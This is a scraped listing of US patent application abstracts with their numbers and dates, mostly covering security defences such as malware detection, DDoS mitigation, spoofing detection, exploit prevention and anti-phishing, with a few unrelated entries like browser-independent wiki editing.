20120144480Using Virtual Table Protections to Prevent the Exploitation of Object Corruption Vulnerabilities - The subject disclosure is directed towards preventing the exploitation by malicious code of object state corruption vulnerabilities, such as use-after-free vulnerabilities. An object class is configured with a secret cookie in a virtual function table of the object, e.g., inserted at compile time. An instrumentation check inserted in the program code evaluates the secret cookie to determine whether the object state has been corrupted before object access (e.g., a call to one of the object's methods) is allowed. If corrupted, access to the object is prevented by the instrumentation check. Another instrumentation check may be used to determine whether the object's virtual table pointer points to a location outside of the module that contains the legitimate virtual function table; if so, object access is prevented.06-07-2012
20080244740BROWSER-INDEPENDENT EDITING OF CONTENT - A system for editing a web page includes receiving the web page in a normalized form, where the normalized form is independent of any browser form. The page may be displayed to a user, where the web page has been translated from the normalized form to a browser-dependent form, and is editable by the user. The web page may be a Wiki or collaborative web page. Overall, described in detail above is a unified editing system for editing a collaborative web page. The collaborative web page has a normalized form that is independent of any browser form. The system displays to a user the collaborative web page that has been translated from the normalized form to a browser-dependent form, wherein the browser-dependent form of the collaborative web page is editable by the user. The unified editing system receives from the user the edited collaborative web page in the browser-dependent form. Other features and aspects of the invention are also disclosed.10-02-2008
20110113490TECHNIQUES FOR PREVENTING ATTACKS ON COMPUTER SYSTEMS AND NETWORKS - Techniques for detecting and responding to attacks on computer and network systems including denial-of-service (DoS) attacks. A packet is classified as potentially being an attack packet if it matches an access control list (ACL) specifying one or more conditions. One or more actions may be performed responsive to packets identified as potential attack packets. These actions may include dropping packets identified as potential attack packets for a period of time, rate limiting a port over which the potential attack packets are received for a period of time, and other actions.05-12-2011
20080209550Method For Detecting and Reacting Against Possible Attack to Security Enforcing Operation Performed by a Cryptographic Token or Card - The approach defines a protection mechanism against attacks to a security enforcing operation performed by cryptographic token or smart card. It is based on an attack detector which signals the main elaboration or processing system regarding a potential attack situation. The approach addresses SIM cloning problems of telecommunications operators who use old and breakable cryptographic algorithms such as the COMP-128 and do not want to invest in updating the network authentication systems with more resistant authentication cryptographic algorithms. The approach may be applicable to the typical telecommunications operator in an emerging market that does not use state of the art technology.08-28-2008
20080229417METHOD FOR CONTROLLING RISK IN A COMPUTER SECURITY ARTIFICIAL NEURAL NETWORK EXPERT SYSTEM - A computer implemented method, data processing system, and computer program product for monitoring system events and providing real-time response to security threats. System data is collected by monitors in the computing system. The expert system of the present invention compares the data against information in a knowledge base to identify a security threat to a system resource in a form of a system event and an action for mitigating effects of the system event. A determination is made as to whether a threat risk value of the system event is greater than an action risk value of the action for mitigating the system event. If the threat risk value is greater, a determination is made as to whether a trust value set by a user is greater than the action risk value. If the trust value is greater, the expert system executes the action against the security threat.09-18-2008
20080229416Computer Network Virus Protection System and Method - A network is protected from viruses through the use of a sacrificial server, which may be physical or virtual. Any executable programs or other suspicious parts of incoming e-mail messages are forwarded to a sacrificial server, where they are converted to non-executable format such as Adobe Acrobat PDF and sent to the recipient. The sacrificial server is then checked for virus activity. After the execution is completed, the sacrificial server is rebooted.09-18-2008
20100293615METHOD AND APPARATUS FOR DETECTING THE MALICIOUS BEHAVIOR OF COMPUTER PROGRAM - A method and an apparatus for detecting malicious behavior of a computer program are disclosed. The method and apparatus analyze behavior characteristics of a malicious program using the concept of a monitored process set. The method comprises: monitoring an action executed by the computer program; searching for a process set associated with the monitored action within a library of monitored process sets, the process set including information of suspicious processes correlated with each other in creating relationships; and if the process set associated with the monitored action is found, judging whether the monitored action belongs to malicious behavior by correlation analysis based on information recorded in the process set found.11-18-2010
20090038008MALICIOUS CODE DETECTION - In a system where an indirect control flow instruction requires a CPU to consult a first memory address, in addition to what is encoded in the instruction itself, for program execution, a method is provided to determine if the first memory address contains a valid or plausible value. The first memory address is compared to an expected or predicted memory address. A difference between the expected or predicted memory address and the first memory address causes an evaluation of any program code about to be executed. The evaluation of code determines whether or not a malicious attack is occurring, or being attempted, that might affect proper operation of the system or program.02-05-2009
20090038009Information Processing Device That Verifies A Computer Program, And Gaming Machine - An apparatus for processing information includes a memory device and a controller. The controller is configured to: access a memory area in the memory device in which information related to a location of data including a computer program is stored; store contents of the memory area as a first inspection code into a first memory area of the memory device; at predetermined timing, access a memory area in the memory device in which the latest information is stored; store contents of the memory area as a second inspection code into a second memory area; compare the first and the second inspection codes; if the second inspection code does not agree with the first inspection code, output an error signal indicating inconsistency between the first and the second inspection codes; and if the second inspection code agrees with the first inspection code, perform verification of the computer program.02-05-2009
20090070870Detecting network attacks - Described is a technique for detecting attacks on a data communications network having a plurality of addresses for assignment to data processing systems in the network. The technique involves identifying data traffic on the network originating at any assigned address and addressed to any unassigned address. Any data traffic so identified is inspected for data indicative of an attack. On detection of data indicative of an attack, an alert signal is generated.03-12-2009
20090070869PROXY ENGINE FOR CUSTOM HANDLING OF WEB CONTENT - Processes and techniques for protecting web users from malicious executable code are described. A proxy engine is implemented that intercepts communications between a web browser and a script engine. The proxy engine can invoke a variety of custom event handlers that are configured to handle specific types of events (e.g., script events) that occur in the processing of web content. A script shield event handler detects the presence of script in pre-defined script-free zones and prevents the script from being executed on a user's device.03-12-2009
20100293614Method, Apparatus, and Computer Program for Providing Application Security - In response to an initialization of the apparatus, a validation value is calculated for each of a plurality of application executable files and the validation values are stored in a protected memory portion of random access memory. An attempt to launch an application on the apparatus is determined, and a current validation value for an executable file associated with the application is calculated. The current validation value is compared with a corresponding one of the stored validation values, and launching of the application is regulated based on results of the comparison.11-18-2010
20130133063TUNNELING-BASED METHOD OF BYPASSING INTERNET ACCESS DENIAL - The tunneling-based method of bypassing Internet access denial allows for the re-routing of communication between a local system and a destination system when the local system's Internet Protocol (IP) address has been blocked by a malicious higher-tier Internet service provider (ISP). If it is determined that the local system is blocked from communicating with the destination system, then it is determined if a malicious higher-tier ISP is responsible for the blockage of service. If the local system is blocked by the ISP, then the ISP is identified and communication is established between the local system and a neighboring system that is not blocked by the ISP. Finally, communications are then transmitted from the local system to the destination system, through the established tunnel, by first transmitting from the local system to the neighboring system, and then transmitting from the neighboring system through the ISP to the destination system.05-23-2013
20100306844APPLICATION INFORMATION TAMPERING MONITORING APPARATUS AND METHOD - A tampering monitoring apparatus (12-02-2010
20130139252SECURING NETWORK COMMUNICATIONS FROM BLIND ATTACKS WITH CHECKSUM COMPARISONS - Blind attacks on a protocol connection, such as a TCP connection, are prevented by inserting checksums computed during protocol connection establishment handshake into data sent through the connection and invalidating data sent through the connection that lacks the protocol setup information checksums. Reset attacks are prevented by invalidating reset requests unless a master checksum computed from the protocol setup information checksums is included with the reset request. Checksums computed from protocol setup information have improved robustness by including a random number with the protocol setup information.05-30-2013
20130139253Deceptive indicia notification in a communications interaction - Systems, methods, computer-readable storage mediums including computer-readable instructions and/or circuitry for monitoring deceptive indicia in communications content may implement operations including, but not limited to: receiving one or more signals associated with communication content provided by a first participant in a communications interaction; detecting one or more indicia of deception associated with the one or more signals associated with the communication content; and providing a notification associated with the one or more indicia of deception associated with the communication content to a second participant in the communications interaction receiving the communication content.05-30-2013
20130139254Deceptive indicia notification in a communications interaction - Systems, methods, computer-readable storage mediums including computer-readable instructions and/or circuitry for monitoring deceptive indicia in communications content may implement operations including, but not limited to: receiving one or more signals associated with communication content provided by a participant in a communications interaction; detecting one or more indicia of deception associated with the one or more signals associated with the communication content; and providing a notification associated with the one or more indicia of deception associated with the communication content to the participant providing the communication content.05-30-2013
20130139255Detection of deceptive indicia masking in a communications interaction - Systems, methods, computer-readable storage mediums including computer-readable instructions and/or circuitry for detecting masking of deceptive indicia in communications content may implement operations including, but not limited to: receiving one or more signals associated with communications content provided by a first participant in a communications interaction; and detecting at least one indicia of a modification of the communications content associated with at least one indicia of deception by the first participant.05-30-2013
20130139256Deceptive indicia profile generation from communications interactions - Systems, methods, computer-readable storage mediums including computer-readable instructions and/or circuitry for generating deceptive indicia profiles may implement operations including, but not limited to: detecting one or more indicia of deception associated with one or more signals associated with communication content provided by a participant in a first communications interaction; detecting one or more indicia of deception associated with the one or more signals associated with communications content provided by the participant in a second communications interaction; and generating a deceptive indicia profile for the participant according to indicia of deception detected in the communications content provided by the participant in the first communications interaction and indicia of deception detected in the communications content provided by the participant in the second communications interaction.05-30-2013
20130139257Deceptive indicia profile generation from communications interactions - Systems, methods, computer-readable storage mediums including computer-readable instructions and/or circuitry for generating deceptive indicia profiles may implement operations including, but not limited to: detecting one or more indicia of deception associated with one or more signals associated with communication content provided by a participant in a first communications interaction; detecting one or more indicia of deception associated with one or more signals associated with communications content provided by the participant in a second communications interaction; generating a deceptive indicia profile for the participant according to indicia of deception detected in the communications content provided by the participant in the first communications interaction and indicia of deception detected in the communications content provided by the participant in the second communications interaction; and providing a notification associated with the deceptive indicia profile for the participant to the participant.05-30-2013
20130139259DECEPTIVE INDICIA PROFILE GENERATION FROM COMMUNICATIONS INTERACTIONS - Systems, methods, computer-readable storage mediums and/or circuitry for generating deceptive indicia profiles may implement: detecting one or more indicia of deception associated with one or more signals associated with communication content provided by a participant in a first communications interaction; detecting one or more indicia of deception associated with one or more signals associated with communications content provided by the participant in a second communications interaction; generating a deceptive indicia profile for the participant according to indicia of deception detected in the communications content provided by the participant in the first communications interaction and indicia of deception detected in the communications content provided by the participant in the second communications interaction; and detecting one or more indicia of deception associated with one or more signals associated with communications content provided by the participant in a third communications interaction according to the deceptive indicia profile for the participant.05-30-2013
20110010771DETECTING A DENIAL OF SERVICE ATTACK - A plurality of ranging processes are performed to monitor a status of a wireless link associated with a device identifier. A ranging request that includes the device identifier and a message skip indicator is received. It is determined that the device identifier is already associated with the wireless link. A duration since a previously completed ranging process is determined. Based on the duration, and the message skip indicator, it is determined whether to respond to the ranging request.01-13-2011
20090138967Windows registry modification verification - A method and system is provided by which unauthorized changes to the registry may be detected and that provides the capability to verify whether registry, or other system configuration data, changes that occur on a computer system are undesirable or related to possible malware attack before the changes become effective or are saved on the system. A method for verifying changes to system configuration data in a computer system comprises generating an identifier representing an entry in the system configuration data, packaging the identifier, and sending the packaged identifier to a client for verification. The identifier may be generated by hashing the first portion of the entry and the second portion of the entry to generate the identifier, or by filtering the first portion of the entry and hashing the filtered first portion of the entry and the second portion of the entry to generate the identifier.05-28-2009
20100333202METHOD AND DEVICE FOR DEFENDING AGAINST ATTACKS TO SYSTEMS COMPRISING A PLUG & PLAY FUNCTION - Method for recognizing attacks to at least one interface of a computer system, in particular an automated self-service machine, comprising: monitoring the interface in order to determine changes at the interface; if changes occur, the change is used to determine the probability that an unallowed attack is occurring at the interface; if the probability is beyond a defined threshold, defensive maneuvers are introduced.12-30-2010
201002056690-TOUCH AND 1-TOUCH TECHNIQUES FOR IMPROVING THE AVAILABILITY OF COMPUTER PROGRAMS UNDER PROTECTION WITHOUT COMPROMISING SECURITY - Protected software, such as an application and/or DLL, is monitored by protective software to guard against attacks, while distinguishing spurious, benign events from attacks. In a 1-touch approach, the protected software is monitored in a testing environment to detect spurious, benign events caused by, e.g., incompatibility or interoperability problems. The spurious events can be remediated in different ways, such as by applying a relaxed security policy. In a production mode, or 0-touch mode, when the protected software is subject to attacks, the corresponding remediation can be applied when the spurious events are again detected. Security events which occur in production mode can also be treated as benign when they occur within a specified time window. The applications and/or DLLs can further be classified according to whether they are known to have bad properties, known to be well-behaved, or unknown. Appropriate treatment is provided based on the classification.08-12-2010
20100205668APPARATUS AND METHOD FOR SPAM CONFIGURATION - An apparatus and a method for spam registration in a portable terminal are provided. The method includes determining whether there is a spam registration request for a number, determining, when there is the spam registration request for the number, whether a spam registration prohibit condition not to register the number as spam is satisfied, and not registering the number as spam when the spam registration prohibit condition is satisfied.08-12-2010
20100333201SYSTEM, METHOD, AND PROGRAM FOR DETERMINING VALIDITY OF STRING - A computer-implemented method, program product, and system for determining the validity of a string generated by a computer programming language program. The method includes: abstracting a constraint between variables extracted from source code for a programming language, describing the constraint in M2L, and storing the constraint; and evaluating the validity of the string on an M2L solver on the basis of the constraint and an M2L specification to determine whether the string is safe or unsafe.12-30-2010
20100333200METHOD AND APPARATUS FOR SPAM MESSAGE DETECTION - A method, apparatus and computer program product for spam message detection. The method includes collecting a time domain transmission characteristic of a message source; computing a frequency domain transmission characteristic of the message source from the time domain transmission characteristic of the message source; and identifying the message source as a spammer in response to the frequency domain transmission characteristic of the message source satisfying predefined criteria; wherein the steps of the method are carried out using a computer device. An apparatus and computer program product for carrying out the above method are also provided.12-30-2010
20100333199Method and system for scanning a computer system for sensitive content - A computer-implemented method for scanning a computer system for sensitive data. A scan manager manages a scan of files of a second computer. The scan manager receives a request to scan and identify files stored on the second computer based on at least one category of sensitive data. The scan manager receives scan report recipient information and generates a user profile based on the at least one category and the recipient information. The scan manager makes the user profile available to a category server for use in creating a scan profile defining the scan criteria and deploys a scan agent to a computer to conduct the scan based on the scan profile. When the scan is complete and upon creation of the scan report, the scan manager makes the scan report available to the intended recipients.12-30-2010
20100242111Methods and apparatus providing computer and network security utilizing probabilistic policy reposturing - A system defines at least one key event to be monitored by at least one agent, and creates a graphical model for the at least one key event. The system observes the at least one key event. The system infers a degree of attack on the computer system based on an observation of the at least one key event in conjunction with a result of an effect the at least one key event has on the graphical model. The system then adjusts a security policy based on an output of the graphical model.09-23-2010
20100242109METHOD AND SYSTEM FOR PREEMPTIVE SCANNING OF COMPUTER FILES - In embodiments of the present invention improved capabilities are described for reducing computer file access time associated with on-access scanning through predictive preemptive scanning, where the prediction may be enabled through the development and use of a file access performance cost mapping of a computing facility's file system. In a first step, file access information describing a pattern of each of a plurality of computer files that have been accessed in a computer file system may be collected. In a second step, the file access information may be processed to generate a file access performance cost statistic for each of the plurality of computer files, where the file access performance cost statistic may be a measure of the time aggregate effect on the computing facility's system performance associated with the access of the file. In a third step, the file access performance cost statistic may be maintained for each of the plurality of files accessed by the computing facility. In a fourth step, the file access performance cost mapping of the computing facility's file system relating to the plurality of computer files may be generated, where the file access performance cost mapping may provide an indication of which of the plurality of files in the file system produce the greatest time aggregate file access effect based on the computing facility's system performance. Finally, in a fifth step, files from the computer file system may be pre-scanned based on the file access performance cost mapping. In embodiments, pre-scanning may access at least one of the plurality of files for scanning prior to the file being called for a use, such as by an operating system, an application, a utility program, and the like. The step of pre-scanning may be performed during periods of low computing facility processing activity, and may result in a reduced need to scan the computer file when the computer file is accessed for use.09-23-2010
20100235909System and Method for Detection of a Change in Behavior in the Use of a Website Through Vector Velocity Analysis - A system and software for identifying the change of user behavior on a website includes analyzing the actions of users on a website comprising a plurality of fields or input parameters that identify the actions performed on a website including fields related to previous actions by that user or other users of the website. The fields or input parameters are represented in a vector format where vectors represent different sessions of activity on the website, pages of the website, users of the website, or other attributes of the use of a website. Analysis is performed to determine if new sessions are similar or dissimilar to previously known sessions and if a session is converging or diverging from known sessions based on the velocity and direction of the velocity of the vectors in the vector space.09-16-2010
20100235911SYSTEMS, METHODS, AND COMPUTER READABLE MEDIA FOR DETECTING AND MITIGATING ADDRESS SPOOFING IN MESSAGING SERVICE TRANSACTIONS - Systems, methods, and computer readable media for detecting and mitigating address spoofing in messaging service transactions are disclosed. A messaging service firewall (MSF) separate from a short message service center (SMSC) receives a mobility management reply message (MMR) that is sent by a mobile location register element in response to an associated mobility management query (MMQ) and that includes a serving switch identifier. The MSF allocates a global title address (GTA) from a pool of GTAs and stores a correlation between the allocated GTA and the originating SMSC. The MSF replaces the serving switch identifier in the MMR with the allocated GTA and routes the modified MMR. The MSF then receives a messaging service message (MSM) that is addressed to the allocated GTA and that includes the purported originating SMSC. If the purported originating SMSC does not match the SMSC to which the GTA is correlated, the MSM is discarded.09-16-2010
20110030055Detecting Spoofing in Wireless Digital Networks - Detecting spoofing in a digital network. Packets of information in a digital network using a shared medium contain a unique identifier for the device originating the packet. An individual device may be transmitting, or receiving, but not both. If a device receives a packet containing its unique identifier as the origin address, that packet must have been transmitted by another device, and a spoofing alert is raised.02-03-2011
20100180340Method and System for Filing and Monitoring Electronic Claim Submissions in Multi-Claimant Lawsuits - The invention relates to systems and methods for filing and monitoring electronic claim submissions in proceedings involving a large number of claimants, such as securities class action lawsuits, estate dissolutions, arbitrations, and bankruptcies. The systems and methods create an easy-to-use and convenient way for institutions and individual claimants to register their claim relief upon judgment or settlement.07-15-2010
20110035801METHOD, NETWORK DEVICE, AND NETWORK SYSTEM FOR DEFENDING DISTRIBUTED DENIAL OF SERVICE ATTACK - A method for defending a distributed denial of service (“DDoS”) attack includes analyzing at least one of a running status of a server or a network data stream flowing to the server at the server side to detect whether a DDoS attack occurs on the server and notifying a data stream cleaner that the data stream cleaner needs to clean the network data stream flowing to the server, if the DDoS attack occurs on the server.02-10-2011
20090049549APPARATUS AND METHOD FOR DETECTION OF MALICIOUS PROGRAM USING PROGRAM BEHAVIOR - An apparatus and method of diagnosing whether a computer program executed in a computer system is a malicious program and more particularly, an apparatus and method of diagnosing whether a computer program is a malicious program using a behavior of a computer program, and an apparatus and method of generating malicious code diagnostic data is provided. The apparatus for diagnosing a malicious code may include a behavior vector generation unit which generates a first behavior vector based on a behavior signature extracted from a diagnostic target program; a diagnostic data storage unit which stores a plurality of second behavior vectors for a plurality of sample programs predetermined to be malicious or normal; and a code diagnostic unit which diagnoses whether the diagnostic target program is a malicious code by comparing the first behavior vector with the plurality of second behavior vectors.02-19-2009
20110088094System for efficiently handling cryptographic messages containing nonce values in a wireless connectionless environment without compromising security - A system for determining the validity of a received cryptographic message while allowing for out-of-order messages is utilized to provide for secure communications among peers in a network. In particular, a secure communication module may be configured to accept the cryptographic message in response to the received nonce value of the received message being greater than the largest nonce value yet seen. Otherwise, when the received nonce value is not the largest nonce value yet seen, the secure communication module may be configured to compare the received nonce value with a nonce acceptance window. If the received nonce value falls outside the nonce acceptance window, the secure communication module may be further configured to reject the received message and assume that a replay attack has been detected. If the received nonce value falls within the nonce acceptance window, the secure communication module may be further configured to determine if the received nonce value has been seen before by comparing the received nonce value with a replay window mask. If the received nonce has been seen before, the secure communication module may be further configured to reject the received message and assume a replay attack. Otherwise, the secure communication module may be further configured to accept the message and add the received nonce value to the replay window mask.04-14-2011
20110119760CLASSIFICATION OF SOFTWARE ON NETWORKED SYSTEMS - A method and system for the classification of software in networked systems includes: determining that software received by a sensor is attempting to execute on a computer system of the sensor; classifying the software as authorized or unauthorized to execute; and gathering information on the software by the sensor if the software is classified as unauthorized to execute. The sensor sends the information on the software to one or more actuators, which determine whether or not to act on one or more targets based on the information. If so, then the actuator sends a directive to the target(s). The target(s) updates its responses according to the directive. The classification of the software is definitive and is not based on heuristics or rules or policies and without any need to rely on any a priori information about the software.05-19-2011
20110131653SYSTEMS AND METHODS FOR MANAGING MESSAGES IN AN ENTERPRISE NETWORK - A protocol management system is capable of detecting certain message protocols and applying policy rules to the detected message protocols that prevent intrusion, or abuse, of a network's resources. In one aspect, a protocol message gateway is configured to apply policy rules to high level message protocols, such as those that reside at layer 7 of the ISO protocol stack.06-02-2011
20110131652TRAINED PREDICTIVE SERVICES TO INTERDICT UNDESIRED WEBSITE ACCESSES - Webcrawlers and scraper bots are detrimental because they place a significant processing burden on web servers, corrupt traffic metrics, use excessive bandwidth, excessively load web servers, create spam, cause ad click fraud, encourage unauthorized linking, deprive the original collector/poster of the information of exclusive rights to analyze and summarize information posted on their own site, and enable anyone to create low-cost Internet advertising network products for ultimate sellers. A scalable predictive service distributed in the cloud can be used to detect scraper activity in real time and take appropriate interdictive action up to and including denial of service based on the likelihood that non-human agents are responsible for accesses. Information gathered from a number of servers can be aggregated to provide real time interdiction protecting a number of disparate servers in a network.06-02-2011
20110131651METHOD AND DEVICE FOR DETECTING A SPOOFING ATTACK IN A WIRELESS COMMUNICATION NETWORK - A method and device enables detecting a spoofing attack in a wireless communication network (06-02-2011
20110131650METHODS, DEVICES, SYSTEMS, AND COMPUTER PROGRAM PRODUCTS FOR EDGE DRIVEN COMMUNICATIONS NETWORK SECURITY MONITORING - An edge monitoring approach can be utilized to detect an attack which includes a plurality of relatively low bandwidth attacks, which are aggregated at a victim sub-network. The aggregated low bandwidth attacks can generate a relatively high bandwidth attack including unsolicited data traffic directed to the victim, so that the aggregated attack becomes more detectable at an edge monitor circuit located proximate to the victim. Related systems, devices, and computer program products are also disclosed.06-02-2011
20110126284CONTENT REPRODUCTION DEVICE, CONTENT REPRODUCTION DEVICE CONTROL METHOD, CONTENT REPRODUCTION PROGRAM, RECORDING MEDIUM, AND INTEGRATED CIRCUIT - A content playback device of the present invention includes a playback unit 05-26-2011
20090100517APPARATUS AND METHOD FOR MONITORING AND PROTECTING SYSTEM RESOURCES FROM WEB BROWSER - An apparatus and method for preventing an attempt to perform malicious activities using web browser weaknesses are provided. A file protection module monitors attempts to access at least one file resource when the web browser executes a program, and allows or denies access. A registry protection module monitors attempts to access at least one registry resource when the web browser executes a program, and allows or denies access. A process protection module monitors attempts to execute or terminate at least one process when the web browser executes a program, and allows or denies the execution or termination.04-16-2009
20110214179SECURE METHOD AND SYSTEM FOR COMPUTER PROTECTION - Attacks by computer viruses, worm programs, and other hostile software (‘malware’), have become very serious problems for computer systems connected to large communication networks such as the Internet. One potential defence against such attacks is to employ diversity—that is, making each copy of the attacked software different. However, existing diversity techniques do not offer sufficient levels of protection. The invention provides an effective diversity solution by applying tamper resistant software (TRS) encoding techniques, to the communications that take place between software components, with corresponding changes to the code handling those communications. These communications may include, for example, data passed between software routines via parameters or mutually accessible variables, light-weight messages, signals and semaphores passed between threads, and messages passed between software processes. Effective TRS encoding techniques include data-flow encoding and mass-data encoding techniques.09-01-2011
20110214178System and Method for Detecting and Evicting Malicious Vehicles in a Vehicle Communications Network - In a vehicle communication network, some vehicles may be used by attackers to send false information to other vehicles, which may jeopardize the safety of other vehicles. Vehicles should be able to detect malicious communications activities and to mitigate the impact of malicious vehicles by evicting (eliminating) suspected malicious vehicles from the system. Evicting a vehicle means ignoring the messages sent from the vehicle for a specified time period. Voting and sacrifice principles are combined using a mathematical model based on the “Mafia Game”. The Mafia Game model focuses on the relative size of the group of attackers within a neighborhood necessary to dominate the entire network in the neighborhood (i.e., to eventually evict all the innocent vehicles).09-01-2011
20110214177System and Method for Avoiding and Mitigating a DDoS Attack - Described is a system and method for receiving a data packet including a destination address and a source address, the data packet corresponding to a port number, assigning an address risk value for the data packet based on the source address and a port risk value for the data packet based on the port number. The data packet is categorized into a community based on the source address, wherein the community is predefined by a user corresponding to the destination address, the community includes a utility value. The address risk value and the port risk value are compared to the utility value to yield a benefit coefficient and the data packet is treated based on the benefit coefficient.09-01-2011
20110126283System for Tracking Digital Information Over a Communications Network - A method for tracking digital files transmitted over the Internet by placing certain identifying indicia within a file, and monitoring selected sites through which Internet traffic is transmitted, to determine the source and destination of a transmission containing a file with particular identifying indicia. Identifying indicia (“ID”) is placed in the header of each digital file whose transmission over the Internet is to be monitored. A data communications monitoring device is installed at an Internet service provider's (ISP's) facility. The monitoring device intercepts packets received by the ISP. These intercepted packets are then examined to determine whether they contain an ID of interest. If a sought ID is found within the packet, the source and destination fields in the Internet Protocol (IP) header are logged, along with the ID and other information, in a database. The pertinent contents of the database are then periodically sent to the proprietors whose IDs were discovered in packets in transit across the Internet. A proprietor may then take appropriate steps to secure compensation for the unauthorized copies, or to prevent further dissemination thereof.05-26-2011
20090313698Method for protecting a packet-based network from attacks, and security border node - The invention relates to a security border node (12-17-2009
20090313696CALCULATING A PASSWORD STRENGTH SCORE BASED UPON CHARACTER PROXIMITY AND RELATIVE POSITION UPON AN INPUT DEVICE - A solution for computing password strength based upon layout positions of input mechanisms of an input device that entered a password. A password including an ordered sequence of at least two characters can be identified. A position of each of the characters of the sequence can be determined relative to a layout of an input device used for password entry. Each position can correspond to an input region (key) of the input device (keyboard). A proximity algorithm can generate a proximity score for the determined positions based upon a pattern produced by the positions given the layout of the input device. A password strength score can be computed based at least in part upon the proximity score.12-17-2009
20100132038System and Method for Computer Malware Detection - Disclosed are systems and methods for computer malware detection. The system is configured to emulate execution of a program code, monitor events of program execution, classify the monitored events as malicious or non-malicious, and collect information about unclassifiable events. The system further includes one or more analyst workstations configured to isolate a program analyst from external audiovisual stimuli. The workstation includes a video output device operable to display a list of unclassifiable events and event-related information to the program analyst and a user input device operable to receive the analyst's physiological response indicative of whether the displayed list of unclassifiable events exhibits malicious behavior.05-27-2010
20100132037SYSTEM AND METHOD TO LOCATE A PREFIX HIJACKER WITHIN A ONE-HOP NEIGHBORHOOD - Method, system and computer-readable medium to locate a prefix hijacker of a destination prefix within a one-hop neighborhood on a network. The method includes generating one-hop neighborhoods from autonomous system (AS)-level paths of plural monitors to a destination prefix. The method also includes determining a suspect set of AS identifiers resulting from a union of the one-hop neighborhoods. The method further includes calculating a count and a distance associated with each AS identifier of the suspect set. The count indicates how often the AS identifier appeared in the one-hop neighborhoods. The distance indicates a total distance from the AS identifier to AS identifiers associated with the plural monitors. Yet further, the method includes generating a one-hop suspect set of AS identifiers from the suspect set that have highest counts and highest distances.05-27-2010
20090328211CONTROL FLOW DEVIATION DETECTION FOR SOFTWARE SECURITY - Provided are methods and systems for control flow deviation detection. Provided are methods for software security, comprising executing a software program, generating a run-time signature variable, updating the run-time signature variable as the software program executes, comparing the run-time signature variable with a pre-computed signature, and detecting a deviation in control flow of the software program based on the comparison between the run-time signature variable and the pre-computed signature.12-31-2009
20110247070ANTI-PHISHING PROTECTION - Anti-Phishing protection assists in protecting against phishing attacks. Any links that are contained within a message that has been identified as a phishing message are disabled. A warning message is shown when the phishing message is accessed. The first time a disabled link within the phishing message is selected a dismissible dialog box is displayed containing information about how to enable links in the message. After the user dismisses the dialog, clicking on a disabled link causes the warning message to flash drawing the user's attention to the potential severity of the problem. The links may be enabled by the user by selecting the warning message and choosing the appropriate option. Once the user enables the links, future displays of the message show the links as enabled.10-06-2011
20090031420Methods and systems for network traffic security - The present invention is directed to methods of and systems for adaptive networking that monitors a network resource of a network. The method monitors an application performance. The method categorizes a first subset of traffic of the network. The categories for the first subset include trusted, known to be bad, and suspect. The method determines an action for a second subset of traffic based on the category for the first subset of traffic. Some embodiments provide a system for adaptive networking that includes a first device and traffic that has a first subset and a second subset. The system also includes a first resource and a second resource for the transmission of the traffic. The first device receives the traffic and categorizes the traffic into the first and second subsets. The first device assigns the first subset to the first resource. Some embodiments provide a network device that includes an input for receiving incoming traffic, an output for sending outgoing traffic, a categorization module that categorizes incoming traffic, and a resource assignment module that assigns the categorized traffic for a particular resource. A traffic category for the device includes suspect traffic.01-29-2009
20090254989CLUSTERING BOTNET BEHAVIOR USING PARAMETERIZED MODELS - Identification and prevention of email spam that originates from botnets may be performed by finding similarity in their host property and behavior patterns using a set of labeled data. Clustering models of host properties pertaining to previously identified and appropriately tagged botnet hosts may be learned. Given labeled data, each botnet may be examined individually and a clustering model learned to reflect upon a set of selected host properties. Once a model has been learned for every botnet, clustering behavior may be used to look for host properties that fit into a profile. Such traffic can be either discarded or tagged for subsequent analysis and can also be used to profile botnets preventing them from launching other attacks. In addition, models of individual botnets can be further clustered to form superclusters, which can help understand botnet behavior and detect future attacks.10-08-2009
20090049546Method and Apparatus for Detection of Malicious Behavior in Mobile Ad-Hoc Networks - Systems and methods are provided for detecting malicious behavior in mobile ad-hoc wireless networks. The mobile ad-hoc network contains a plurality of actual nodes and a plurality of decoys that are derived from the actual nodes using duplicate instances of the operational software of the actual nodes in combination with a virtual interconnection topology created to make the decoys appear as actual nodes within the mobile ad-hoc network. The interconnection topology includes routing characteristics indicating that the most efficient path of communication to any given decoy is through at least one actual node in the network. The decoys are used to identify malicious behavior in the network and in particular to identify attempts to communicate directly with decoys in contradiction to the created interconnection topology. When the malicious behavior is associated with an identifiable node, corrective action is taken that includes quarantining that node from the other nodes in the network.02-19-2009
20090313697System and method for pathological pattern protection - In a frame synchronous scrambled communications network, communications are protected from pathological bit patterns that may lead to loss of receiver lock by detecting a pathological bit pattern in an incoming traffic stream using a pathological pattern detector. When a pathological bit pattern, such as a transition-less bit pattern, is detected, a corrective bit pattern is generated and inserted or substituted into the incoming traffic stream before transmission to the receiver. The receiver can be configured to revert the modified traffic stream back to the original traffic stream.12-17-2009
20090217376HOME-USE INFORMATION PRODUCT AND MOBILE TERMINAL - A mobile terminal and a home-use information product capable of retaining the security even under a network attack, while achieving P2P connection. When detecting a network attack, a home-use information product (08-27-2009
20100037316MANAGING A SOFTWARE ITEM ON A MANAGED COMPUTER SYSTEM - A method and system are provided for managing a current software item on a managed computer system connectable to a management computer system via a computer network. The method includes identifying, using an agent application, the current software item on the managed computer system; identifying whether the current software item is an unauthorized software item; and selectively disabling the unauthorized software item.02-11-2010
20100064366Request processing in a distributed environment - A method for request processing in a distributed system includes obtaining event request information at a plurality of application servers, at least some of the event request information pertaining to a resource access request that is sent from a client terminal and that corresponds to a Uniform Resource Locator (URL) resource, transferring the event request information to an anti-attack server, determining, based at least in part on the at least some of the event request information, a total number of access requests to the URL resource made by the client terminal in a specified period of time, and determining, based at least on the total number of access requests determined and a predefined access rule, whether an abnormal access request has been made by the client terminal.03-11-2010
20100077476METHOD AND APPARATUS FOR DETECTING MALWARE IN NETWORK TRAFFIC - A method and apparatus for detecting malware in network traffic is described. One embodiment executes, in an emulation environment, an executable file as it is being received serially over a network, execution beginning once a block of data including an entry point of the executable file has been received, execution halting whenever an instruction in the executable file references data not yet received and resuming once the data not yet received has been received, execution ceasing upon satisfaction of a termination condition; examining the emulation environment for indications that the executable file includes malware; and taking corrective action responsive to the results of examining the emulation environment for indications that the executable file includes malware.03-25-2010
